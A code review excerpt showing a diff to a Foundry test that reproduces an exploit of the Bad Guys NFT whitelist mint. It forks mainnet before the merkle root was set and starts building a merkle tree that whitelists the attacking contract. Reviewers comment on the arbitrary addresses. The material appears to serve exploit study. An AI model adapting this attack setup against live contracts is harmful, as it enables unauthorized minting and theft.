test/Bad_Data_Validation/Bad_Guys_NFT/Bad_Guys_NFT.attack.sol

```diff
@@ -3,57 +3,110 @@ pragma solidity ^0.8.17;
 
 import "forge-std/Test.sol";
 import {TestHarness} from "../../TestHarness.sol";
-
+import "./MerkleTree.sol";
 interface IBadGuys {
     function WhiteListMint(bytes32[] calldata _merkleProof, uint256 chosenAmount) external;
     function flipPauseMinting() external;
     function balanceOf(address owner) external view returns (uint256 balance);
+    function setRootHash(bytes32 _updatedRootHash) external;
 }
 
 contract Exploit_Bad_Guys_NFT is TestHarness {
-    
+    MerkleTree internal merkleTree;
+    bytes32[] public treeData;
+
     IBadGuys internal constant nft = IBadGuys(0xB84CBAF116eb90fD445Dd5AeAdfab3e807D2CBaC);
     address internal constant project_owner = 0x09eFF2449882F9e727A8e9498787f8ff81465Ade;
     address internal constant attacker = 0xBD8A137E79C90063cd5C0DB3Dbabd5CA2eC7e83e;
 
-    // TODO: we could improve this scenario by removing `prank(ATTACKER)` and redoing
-    // the logic of constructing a merkle proof for an arbitrary address
     function setUp() external {
-        cheat.createSelectFork("mainnet", 15460093); // One before the mint
+        cheat.createSelectFork("mainnet", 15453652); // One before setting the merkle root
+        
+        // Add data to the Whitelist Tree. The data could be bigger. 
+        // Adding this contract into the whitelist in an arbitrary position.
+        bytes32[] memory newData = new bytes32[](5);
+        newData[0] = keccak256(abi.encodePacked(address(0x69)));
```

Comment:
What are these constants?

Reply:
Just arbitrary addresses that the owner could add to the tree

Reply:
Could be nice to add a comment stating that so it's not confusing for the reader.